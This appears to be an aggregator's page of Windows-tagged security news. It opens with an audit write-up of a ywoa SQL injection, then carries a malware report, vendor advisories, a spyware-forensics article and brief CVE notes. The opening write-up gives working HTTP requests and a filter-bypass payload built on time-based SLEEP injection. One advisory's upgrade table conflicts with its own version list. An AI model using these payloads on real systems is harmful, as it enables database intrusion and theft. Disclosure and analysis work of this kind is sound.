Yimioa v6.1 was discovered to contain a SQL injection vulnerability via the orderbyGET parameter.

**ywoaSQL-Inject-Bypass****Environment build****Windows build**

Recommended to use Windows build, because idea build is very troublesome, and report a lot of errors, Windows is a one-click deployment

http://partner.yimihome.com/static/index.html#/index/sys\_env

**1, personnel - personnel information - orderbyGET parameter SQL injection**

POST /oa/visual/moduleList.do?op=&code=personbasic&orderBy=id+%26%26+(/\*!%53eLEct\*/+1+FROM+(/\*!%53eLEct\*/(sleep(5)))a)&sort=desc&unitCode=& HTTP/1.1
Host: 172.16.140.176:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: \*/\*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: JSESSIONID=A4CD4E79F3B246F5268600DDF907FA54; skincode=lte; name=admin; pwd=p5Bx7jxXNGCCEsQLv/rG4w==; cwbbs.auth=LkPkBkEkAkNmJmHmHhEmNmHmHmPmBmPmPmOhOhKmMmMhJlDlDiGlAlMlCiDiNlIiJlIlMlMlPlNl
Content-Length: 15

page=2&limit=20

Bypass Payload

id+%26%26+(/\*!%53eLEct\*/+1+FROM+(/\*!%53eLEct\*/(sleep(5)))a)

**Environment build****Windows build**

Recommended to use Windows build, because idea build is very troublesome, and report a lot of errors, Windows is a one-click deployment  
  
One-click installation, after the installation will prompt the system has expired, go to setup and take a look  
  
Until June 1, but it's okay, here to change the system time can be  
  
  
Login successfully

**Code audit****1\. Personnel - personnel information - orderbyGET parameter SQL injection**

  

POST /oa/visual/moduleList.do?op=&code=personbasic&orderBy=id+AND+(SELECT+1+FROM+(SELECT(SLEEP(5)))a)&sort=desc&unitCode=& HTTP/1.1
Host: 192.168.0.35:9888
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: application/json
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://192.168.0.35:9888/oa/swagger-ui.html
Origin: http://192.168.0.35:9888
Connection: close
Cookie: JSESSIONID=D767FF96902770375A5E31400342B545; skincode=lte; name=admin; pwd=; cwbbs.auth=LkPkBkEkAkNmJmHmHhEmNmHmHmPmBmPmPmOhOhKmMmMhJlDlDiGlAlMlCiDiNlIiJlIlMlMlPlNl
Content-Length: 137

page=1&limit=20&realname\_cond=0&realname=test18&sex=&sex\_cond=1&dept=&dept\_cond=0&op=search&moduleCode=personbasic&menuItem=1&mainCode=

**SQL injection Bypass**

The above injection payload is as follows

id+AND+(SELECT+1+FROM+(SELECT(SLEEP(5)))a)

The environment here is from idea, but idea has a lot of error reports, many functions are not available, I changed to Windows one-click deployment  
  
After building it, debug it remotely with idea  
  
When you try to reproduce this vulnerability again, you will be prompted with an XSS interception  
  
  
It was curious at the time why this was XSS intercepted and not SQL intercepted? Look at the code  
  
The specific detection logic is in the filter method in SecurityUtil.java, so let's look at the code logic here  
  
Briefly, the main thing here is to get the values of the request parameters, and then pass them one by one to the following detection logic  
  
Since we just prompted for an XSS attack, we will follow directly into the method antixss to see the specific implementation logic  
Next you will come to Antixss.Java

    src/main/java/com/cloudwebsoft/framework/security/AntiXSS.java
    

  
The antiXSS method is called by passing in the html to be detected and a true  
  
Follow directly in to see  
  
Check the \_antiXSS method, where the content is passed in is the content to be detected  
  
Here is the specific detection logic, but I'm only looking at the stripScriptTag method here, because it is the content inside this method that is detected, and our focus is only on what parameters are detected  
  
Mainly by means of regularity and case-insensitive because of CASE_INSENSITIVE  
  
Pull the following when you can see, in fact, and or sleep is filtered, create a new test class, and adjust it to know  
  
Remove AND  
  
The statement is normal, put back and remove sleep, the statement is normal, so since this is the case, replace and with &&, you can  
  
statement returns normally, then after returning here  
  
Returning to SecurityUtil.java, it will enter the logic of SQL injection, following the isValidSqlParam method  
  
Follow the sql_inj method  
  
We have already bypassed the detection of and and need to bypass the code logic in the second box  
  
The main logic here is to separate inj\_str using |, which will generate a list to inj\_stra\[\], and then iterate through the list, each loop will use the indexOf method to determine whether the value in inj\_stra\[i\] is in str, that is, if indexOf returns > 0 value exists, and vice versa, it does not exist, here you can also write a class tuned  
  
  
In the sixth loop, which is when select is detected, then it is obvious that you need to bypass select  
Here I was going to try to use

&& extractvalue(1,concat('~',database()))

Unfortunately, '~' will be detected as XSS, so this method does not work  
  
The && here needs to be converted to url encoding, otherwise this request will report 400  
  
So we can only think of ways to select this keyword, here is a bypass of the payload

id+%26%26+(/\*!%53eLEct\*/+1+FROM+(/\*!%53eLEct\*/(sleep(5)))a)

  
Tips: Here just by looking at the screenshot you may think that you can bypass it with SELECT capitalization, but in fact it will be converted to lowercase before calling the sql_inj method  
  
So there is no way to capitalize to bypass

POST /oa/visual/moduleList.do?op=&code=personbasic&orderBy=id+%26%26+(/\*!%53eLEct\*/+1+FROM+(/\*!%53eLEct\*/(sleep(5)))a)&sort=desc&unitCode=& HTTP/1.1
Host: 172.16.140.176:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: \*/\*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: JSESSIONID=A4CD4E79F3B246F5268600DDF907FA54; skincode=lte; name=admin; pwd=p5Bx7jxXNGCCEsQLv/rG4w==; cwbbs.auth=LkPkBkEkAkNmJmHmHhEmNmHmHmPmBmPmPmOhOhKmMmMhJlDlDiGlAlMlCiDiNlIiJlIlMlMlPlNl
Content-Length: 15

page=2&limit=20

**Function implementation entrance**

  
  
First will get the get parameter code, if the code parameter is empty, then get the Get parameter moduleCode and assign it to code, if there is no moduleCode in the get parameter, then get the formCode and copy it to code, here the code parameter passed in is personbasic  
  
Continue to the next page  
  
Here is the OA developer's own implementation of the SQLBuilder class  
  
  
Follow this method  
  
Follow such as getModuleListSqlAndUrlStr method, then a sql str will be returned, continue down the line is the place that causes SQL injection  
  
Follow up this listResult method  
  
The statements will then be spelled out in the middle  
  
The executeQuery statement is then executed  
  
The difference between the above and the SQL statement is that one is the count spliced in and the other is the original passed in  
  
This is followed by a return, which is executed here with a 5-second wait, so it causes an injection

CVE-2022-36605: ywoa SQL inject Bypass and Analysis of the article · Issue #24 · cloudwebsoft/ywoa

The Donot Team threat actor has updated its Jaca Windows malware toolkit with improved capabilities, including a revamped stealer module designed to plunder information from Google Chrome and Mozilla Firefox browsers.
The improvements also include a new infection chain that incorporates previously undocumented components to the modular framework, Morphisec researchers Hido Cohen and Arnold

The **Donot Team** threat actor has updated its **Jaca** Windows malware toolkit with improved capabilities, including a revamped stealer module designed to plunder information from Google Chrome and Mozilla Firefox browsers.

The improvements also include a new infection chain that incorporates previously undocumented components to the modular framework, Morphisec researchers Hido Cohen and Arnold Osipov disclosed in a report published last week.

Also known as APT-C-35 and Viceroy Tiger, the Donot Team is known for setting its sights on defense, diplomatic, government, and military entities in India, Pakistan, Sri Lanka, and Bangladesh, among others at least since 2016.

Evidence unearthed by Amnesty International in October 2021 connected the group's attack infrastructure to an Indian cybersecurity company called Innefu Labs.

Spear-phishing campaigns containing malicious Microsoft Office documents are the preferred delivery pathway for malware, followed by taking advantage of macros and other known vulnerabilities in the productivity software to launch the backdoor.

The latest findings from Morphisec build on a prior report from cybersecurity company ESET, which detailed the adversary's intrusions against military organizations based in South Asia using several versions of its yty malware framework, one of which is Jaca.

This entails the use of RTF documents that trick users into enabling macros, resulting in the execution of a piece of shellcode injected into memory that, in turn, is orchestrated to download a second-stage shellcode from its command-and-control (C2) server.

The second-stage then acts as a channel to retrieve a DLL file ("pgixedfxglmjirdc.dll" from another remote server, which kick-starts the actual infection by beaconing system information to the C2 server, establishing persistence via a Scheduled Task, and fetching the next-stage DLL ("WavemsMp.dll").

"The main purpose of this stage is to download and execute the modules used to steal the user's information," the researchers noted. "To understand which modules are used in the current infection, the malware communicates with another C2 server."

The C2 domain, for its part, is obtained by accessing an embedded link that points to a Google Drive document, allowing the malware to access a configuration that dictates the modules to be downloaded and executed.

These modules expand on the malware's features and harvest a wide range of data such as keystrokes, screenshots, files, and information stored in web browsers. Also, part of the toolset is a reverse shell module that grants the actor remote access to the victim machine.

The development is yet another sign that threat actors are actively adapting their tactics and techniques that are most effective in gaining initial infection and maintaining remote access for extended periods of time.

"Defending against APTs like the Donot team requires a Defense-in-Depth strategy that uses multiple layers of security to ensure redundancy if any given layers are breached," the researchers said.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

DoNot Team Hackers Updated its Malware Toolkit with Improved Capabilities

Kiosk breakout (without quit password) in Safe Exam Browser (Windows) <3.4.0, which allows an attacker to achieve code execution via the browsers' print dialog.

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Pick a username

Email Address

Password

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CVE-2022-36220: Kiosk escape (vulnerability disclosure) · Issue #434 · SafeExamBrowser/seb-win-refactoring

In affected versions of Octopus Deploy it is possible to perform a Regex Denial of Service targeting the build information request validation.

Summary

ReDoS in Build Information request (CVE-2022-2075)

Advisory Number

2022-12

Discovery Date

06 Jun 2022

Patch Release Date

21 Jun 2022

Advisory Release Date

19 Aug 2022

Product

Octopus Server

Operating System

Linux and Microsoft Windows

Severity

Medium

CVE ID

CVE-2022-2075

Customers who have downloaded and installed any of the Octopus Server versions listed below ("Details") are affected.

Please upgrade your Octopus Server immediately to fix this vulnerability.

Customers who have upgraded Octopus Server to version 2022.2.6872 or higher are not affected.

**Severity**

Octopus Deploy has given this vulnerability a Medium rating. This rating was given according to the Octopus Deploy severity levels, which ranks vulnerabilities as critical, high, medium, or low severity.

This is our assessment and you should evaluate its applicability to your own environment.

**Details**

In affected versions of Octopus Deploy it is possible to perform a Regex Denial of Service targeting the build information request validation. When performed successfully, this results in Octopus Server becoming unresponsive due to excessive CPU usage.

The versions of Octopus Server affected by this vulnerability are:

*   All 0.x.x, 1.x.x, 2.x.x, 3.x.x, 4.x.x versions
*   All 2018.x, 2019.x, 2020.x, 2021.x versions
*   All 2022.1.x versions before 2022.1.2894
*   All 2022.2.x versions before 2022.2.6872
*   All 2022.3.x versions before 2022.3.4953

As of the 19/08/2022 Octopus Server version 2022.3.x is only available on Octopus Cloud.

**Fix**

To address this vulnerability, we have released Octopus Server version:

*   2022.1.2894
*   2022.2.6872
*   2022.3.4953

The latest versions of Octopus Deploy products can be downloaded from https://octopus.com/downloads and previous versions can be downloaded from https://octopus.com/downloads/previous

**What You Need to Do**

Octopus Deploy recommends that you upgrade to the latest version (2022.2.6872). You can download the latest version of Octopus Server from https://octopus.com/downloads

**If you can't upgrade to the latest version (2022.2.6872):**

If you have feature version...

...then upgrade to this version

0.x.x, 1.x.x, 2.x.x, 3.x.x, 4.x.x

2022.1.2894 or greater

2018.x, 2019.x, 2020.x, 2021.x

2022.1.2894 or greater

2022.1.x

2022.1.2894 or greater

2022.2.x

2022.2.6872 or greater

2022.3.x

2022.3.4953 or greater

**Mitigation**

There is no known mitigation for CVE-2022-2075, it is important to upgrade to a fixed version as soon as possible.

**Support**

If you have any questions or concerns regarding this advisory, please contact our support team https://octopus.com/support.

**Exploitation and Public Announcements**

The Octopus Deploy security team is not aware of any public announcements or malicious use of the vulnerability that is described in this advisory.

**Source**

This vulnerability was found by Bartłomiej Górkiewicz

CVE-2022-2075: Security Advisory 2022-12

In affected versions of Octopus Deploy it is possible to perform a Regex Denial of Service using the Variable Project Template.

Summary

ReDoS in Variable Project Templates (CVE-2022-2074)

Advisory Number

2022-11

Discovery Date

12 Jun 2022

Patch Release Date

21 Jun 2022

Advisory Release Date

19 Aug 2022

Product

Octopus Server

Operating System

Linux and Microsoft Windows

Severity

High

CVE ID

CVE-2022-2074

Customers who have downloaded and installed any of the Octopus Server versions listed below ("Details") are affected.

Please upgrade your Octopus Server immediately to fix this vulnerability.

Customers who have upgraded Octopus Server to version 2022.2.6872 or higher are not affected.

**Severity**

Octopus Deploy has given this vulnerability a high rating. This rating was given according to the Octopus Deploy severity levels, which ranks vulnerabilities as critical, high, medium, or low severity.

This is our assessment and you should evaluate its applicability to your own environment.

**Details**

In affected versions of Octopus Deploy it is possible to perform a Regex Denial of Service using the Variable Project Template.. When performed successfully, this results in Octopus Server becoming unresponsive due to excessive CPU usage.

The versions of Octopus Server affected by this vulnerability are:

*   All 0.x.x, 1.x.x, 2.x.x, 3.x.x, 4.x.x versions
*   All 2018.x, 2019.x, 2020.x, 2021.x versions
*   All 2022.1.x versions before 2022.1.2894
*   All 2022.2.x versions before 2022.2.6872
*   All 2022.3.x versions before 2022.3.4953

As of the 19/08/2022 Octopus Server version 2022.3.x is only available on Octopus Cloud.

**Fix**

To address this vulnerability, we have released Octopus Server version:

*   2022.1.2894
*   2022.2.6872
*   2022.3.4953

The latest versions of Octopus Deploy products can be downloaded from https://octopus.com/downloads and previous versions can be downloaded from https://octopus.com/downloads/previous

**What You Need to Do**

Octopus Deploy recommends that you upgrade to the latest version (2022.2.6872). You can download the latest version of Octopus Server from https://octopus.com/downloads

**If you can't upgrade to the latest version (2022.2.6872):**

If you have feature version...

...then upgrade to this version

0.x.x, 1.x.x, 2.x.x, 3.x.x, 4.x.x

2022.1.2894 or greater

2018.x, 2019.x, 2020.x, 2021.x

2022.1.2894 or greater

2022.1.x

2022.1.2894 or greater

2022.2.x

2022.2.6872 or greater

2022.3.x

2022.3.4953 or greater

**Mitigation**

There is no known mitigation for CVE-2022-2074, it is important to upgrade to a fixed version as soon as possible.

**Support**

If you have any questions or concerns regarding this advisory, please contact our support team https://octopus.com/support.

**Exploitation and Public Announcements**

The Octopus Deploy security team is not aware of any public announcements or malicious use of the vulnerability that is described in this advisory.

**Source**

This vulnerability was found by Bartłomiej Górkiewicz

CVE-2022-2074: Security Advisory 2022-11

In affected versions of Octopus Deploy it is possible to perform a Regex Denial of Service via the package upload function.

Summary

ReDoS in Package Upload Files (CVE-2022-2049)

Advisory Number

2022-10

Discovery Date

02 Jun 2022

Patch Release Date

21 Jun 2022

Advisory Release Date

19 Aug 2022

Product

Octopus Server

Operating System

Linux and Microsoft Windows

Severity

Medium

CVE ID

CVE-2022-2049

Customers who have downloaded and installed any of the Octopus Server versions listed below ("Details") are affected.

Please upgrade your Octopus Server immediately to fix this vulnerability.

Customers who have upgraded Octopus Server to version 2022.2.6872 or higher are not affected.

**Severity**

Octopus Deploy has given this vulnerability a medium rating. This rating was given according to the Octopus Deploy severity levels, which ranks vulnerabilities as critical, high, medium, or low severity.

This is our assessment and you should evaluate its applicability to your own environment.

**Details**

In affected versions of Octopus Deploy it is possible to perform a Regex Denial of Service via the package upload function. When performed successfully, this results in Octopus Server becoming unresponsive due to excessive CPU usage.

The versions of Octopus Server affected by this vulnerability are:

*   All 0.x.x, 1.x.x, 2.x.x, 3.x.x, 4.x.x versions
*   All 2018.x, 2019.x, 2020.x, 2021.x versions
*   All 2022.1.x versions before 2022.1.2894
*   All 2022.2.x versions before 2022.2.6872
*   All 2022.3.x versions before 2022.3.4953

As of the 19/08/2022 Octopus Server version 2022.3.x is only available on Octopus Cloud.

**Fix**

To address this vulnerability, we have released Octopus Server version:

*   2022.1.2894
*   2022.2.6872
*   2022.3.4953

The latest versions of Octopus Deploy products can be downloaded from https://octopus.com/downloads and previous versions can be downloaded from https://octopus.com/downloads/previous

**What You Need to Do**

Octopus Deploy recommends that you upgrade to the latest version (2022.2.6872). You can download the latest version of Octopus Server from https://octopus.com/downloads

**If you can't upgrade to the latest version (2022.2.6872):**

If you have feature version...

...then upgrade to this version

0.x.x, 1.x.x, 2.x.x, 3.x.x, 4.x.x

2022.1.2894 or greater

2018.x, 2019.x, 2020.x, 2021.x

2022.1.2894 or greater

2022.1.x

2022.1.2894 or greater

2022.2.x

2022.2.6872 or greater

2022.3.x

2022.3.4953 or greater

**Mitigation**

There is no known mitigation for CVE-2022-2049, it is important to upgrade to a fixed version as soon as possible.

**Support**

If you have any questions or concerns regarding this advisory, please contact our support team https://octopus.com/support.

**Exploitation and Public Announcements**

The Octopus Deploy security team is not aware of any public announcements or malicious use of the vulnerability that is described in this advisory.

**Source**

This vulnerability was found by Bartłomiej Górkiewicz

CVE-2022-2049: Security Advisory 2022-10

In affected versions of Octopus Deploy it is possible to unmask sensitive variables by using variable preview.

Summary

Sensitive variable value displayed in Variable Preview (CVE-2022-1901)

Advisory Number

2022-09

Discovery Date

26 May 2022

Patch Release Date

11 Jul 2022

Advisory Release Date

19 Aug 2022

Product

Octopus Server

Operating System

Linux and Microsoft Windows

Severity

Medium

CVE ID

CVE-2022-1901

Customers who have downloaded and installed any of the Octopus Server versions listed below ("Details") are affected.

Please upgrade your Octopus Server immediately to fix this vulnerability.

Customers who have upgraded Octopus Server to version 2022.2.7244 or higher are not affected.

**Severity**

Octopus Deploy has given this vulnerability a medium rating. This rating was given according to the Octopus Deploy severity levels, which ranks vulnerabilities as critical, high, medium, or low severity.

This is our assessment and you should evaluate its applicability to your own environment.

**Details**

In affected versions of Octopus Deploy it is possible to unmask sensitive variables by using variable preview.

The versions of Octopus Server affected by this vulnerability are:

*   All 2019.x versions after 2019.7.3
*   All 2020.x and 2021.x versions
*   All 2022.1.x versions before 2022.1.3009
*   All 2022.2.x versions before 2022.2.7244
*   All 2022.3.x versions before 2022.3.4953

As of the 19/08/2022 Octopus Server version 2022.3.x is only available on Octopus Cloud.

**Fix**

To address this vulnerability, we have released Octopus Server version:

*   2022.1.3009
*   2022.2.7244
*   2022.3.4953

The latest versions of Octopus Deploy products can be downloaded from https://octopus.com/downloads and previous versions can be downloaded from https://octopus.com/downloads/previous

**What You Need to Do**

Octopus Deploy recommends that you upgrade to the latest version (2022.2.7239). You can download the latest version of Octopus Server from https://octopus.com/downloads

**If you can't upgrade to the latest version (2022.2.7239):**

If you have feature version...

...then upgrade to this version

2019.x versions after 2019.7.3

2022.1.2849 or greater

2020.x, 2021.x

2022.1.2849 or greater

2022.1.x

2022.1.2849 or greater

2022.2.x

2022.2.6729 or greater

2022.3.x

2023.3.2387 or greater

**Mitigation**

This vulnerability can be mitigated by removing the VariableEdit permission from roles that do not require the ability to edit Variables. The permissions cannot cross scope into other projects or environments (test permissions cant unmask prod variables).

We have reviewed the default user roles and determined that the following roles have VariableEdit (and VariableView) permission.

*   Project Contributor
*   Project Deployer
*   Project Lead
*   Runbook Producer
*   Space Manager

The following role also has the VariableView permission. While this permission won't allow the unmasking of secret variables, it will allow the users with this role the ability to see variables that have been unmasked.

*   Runbook Consumer

The above roles can be modified by clearing the checkbox for the VariableEdit permission in the space permissions page of the role.

**Support**

If you have any questions or concerns regarding this advisory, please contact our support team https://octopus.com/support.

**Exploitation and Public Announcements**

The Octopus Deploy security team is not aware of any public announcements or malicious use of the vulnerability that is described in this advisory.

**Source**

This vulnerability was identified by a customer

CVE-2022-1901: Security Advisory 2022-09

Printix Cloud Print Management v1.3.1149.0 for Windows was discovered to contain insecure permissions.

CVE-2022-35167

This invasive malware isn’t just for phones—it can target your PC, too. But a new batch of algorithms aims to weed out this threat.

The surveillance-for-hire industry's powerful mobile spyware tools have gotten increasing attention lately as tech companies and governments grapple with the scale of the threat. But spyware that targets laptops and desktop PCs is extremely common in an array of cyberattacks, from state-backed espionage to financially motivated scams. Due to this growing threat, researchers from the incident response firm Volexity and Louisiana State University presented at the Black Hat security conference in Las Vegas last week new and refined tools that practitioners can use to catch more PC spyware in Windows 10, macOS 12, and Linux computers.

Widely used PC spyware—the type that often keylogs targets, tracks the movement of their mouse and clicks, listens in through a computer's microphone, and pulls still photos or video from the camera—can be difficult to detect because attackers intentionally design it to leave a minimal footprint. Rather than installing itself on a target's hard drive like a regular application, the malware (or its most important components) exists and runs only in the target computer's memory or RAM. This means that it doesn't generate certain classic red flags, doesn't show up in regular logs, and gets wiped away when a device is restarted. 

Enter the field of “memory forensics,” which is geared precisely toward developing techniques to assess what's going on in this liminal space. At Black Hat, the researchers specifically announced new detection algorithms based on their findings for the open source memory forensics framework Volatility. 

“Memory forensics was very different five or six years ago as far as how it was being used in the field both for incident response and by law enforcement,” Volexity director Andrew Case tells WIRED. (Case is also a lead developer of Volatility.) “It’s gotten to the point where even outside really intense malware investigations, memory forensics is needed. But for evidence or artifacts from a memory sample to be used in court or some type of legal proceeding, we need to know that the tools are working as expected and that the algorithms are validated. This latest stuff for Black Hat is really some hardcore new techniques as part of our effort to build out verified frameworks."

Case emphasizes that expanded spyware detection tools are needed because Volexity and other security firms regularly see real examples of hackers deploying memory-only spyware in their attacks. At the end of July, for example, Microsoft and the security firm RiskIQ published detailed findings and mitigations to counter the Subzero malware from an Austrian commercial spyware company, DSIRF.

“Observed victims \[targeted with Subzero\] to date include law firms, banks, and strategic consultancies in countries such as Austria, the United Kingdom, and Panama,” Microsoft and RiskIQ wrote. Subzero’s main payload, they added, “resides exclusively in memory to evade detection. It contains a variety of capabilities including keylogging, capturing screenshots, exfiltrating files, running a remote shell, and running arbitrary plugins.”

The researchers particularly focused on honing their detections for how the different operating systems talk to “hardware devices” or sensors and components like the keyboard and camera. By monitoring how the different parts of the system run and communicate with each other and looking for new behaviors or connections, memory forensic algorithms can catch and analyze more potentially malicious activity. One potential tell, for example, is to monitor an operating system process that’s always running, say the feature that lets users log in to a system, and to flag it if additional code gets injected into that process after it starts running. If code was introduced later it could be a sign of malicious manipulation.

“If you work in the incident response field, you likely see this malware all the time,” Case said during his Black Hat talk last week. “We see this targeted at our clients on a daily basis. And if you read the reports from other security vendors, it’s pretty much universal that when you have a motivated threat group targeting an organization—whether that’s a research group inside the organization, whether it’s executives, whether it’s down to just an individual person—the malware that gets deployed on those machines are going to leverage access to hardware devices for truly sensitive information.”

To do forensic analysis of what's happening in a device's memory at a given time, researchers dump the memory into a sort of snapshot file of everything that was in there at that moment. If your laptop has 16 GB of RAM and the memory is full, you'll pull out a 16-GB file from it. But to detect attacks in real time, organizations need to set up forensic monitoring on their devices in advance. And not all operating systems make it easy to conduct such monitoring.

Apple, in particular, is known for locking down access to macOS and iOS to minimize system visibility. The company says it takes this approach as a security measure because, in its estimation, users shouldn't need that level of access to operate within the tightly controlled Apple ecosystem. But the stance has been controversial for a number of reasons and has created tension with some security advocates, who say that when exploitable vulnerabilities do inevitably crop up in Apple's software, particularly iOS, the approach gives the hackers an advantage because defenders have more limited insight and control. 

“It can make exploitation harder, and it can make gaining malware persistence on a system harder,” Case says. “But it also makes forensics harder, so the argument goes both ways.” 

The team was able to make progress on developing detection tools for all three major desktop operating systems, though. And Case emphasizes that the goal is simply to detect as much spyware as possible wherever it can be done as the malware proliferates more and more.

“We work with a ton of very targeted organizations around the world and in the US, and it's organizations themselves being targeted. But also, many times, it’s individuals within the organization or within a political movement—these are the people who get targeted with this type of malware,” he says. “So the further we get on this research and the better our forensic tools are, the more we can find this behavior and make it harder for attackers to get into an environment, stay there, and get to data they want.”

Spyware Hunters Are Expanding Their Toolset

Unsafe Parsing of a PNG tRNS chunk in FastStone Image Viewer through 7.5 results in a stack buffer overflow.

Tag

#windows